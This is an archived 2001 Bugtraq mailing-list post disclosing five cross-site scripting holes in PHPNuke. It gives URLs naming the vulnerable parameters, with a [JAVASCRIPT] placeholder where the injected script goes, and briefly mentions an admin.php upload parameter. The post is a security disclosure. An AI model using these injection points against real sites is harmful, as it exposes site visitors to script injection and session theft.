Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

PHPNuke holes

From: frog frog <leseulfrog () hotmail com>
Date: 15 Dec 2001 01:47:27 -0000


Here a few holes that i've found in PHPNuke.
5 Cross Site Scripting.

http://phpnuke.org/modules.php?
name=Downloads&d_op=viewdownloaddetails&lid=0
2&ttitle=[JAVASCRIPT]

http://phpnuke.org/modules.php?
name=Downloads&d_op=ratedownload&lid=118&ttitle
=[JAVASCRIPT]

http://phpnuke.org/modules.php?
op=modload&name=Members_List&file=index&letter
=[JAVASCRIPT]

http://phpnuke.org/submit.php?subject=
[JAVASCRIPT]&story=[JAVASCRIPT]&storyext=
[JAVASCRIPT]&op=Preview

http://phpnuke.org/user.php?op=userinfo&uname=
[JAVASCRIPT] ==> This hole was not found by 
Aurelien Cabezon.


and /admin.php?upload=Go! who's the same that 
upload=1 .

frog-man
Previous By Date Next
Previous By Thread Next

Current thread: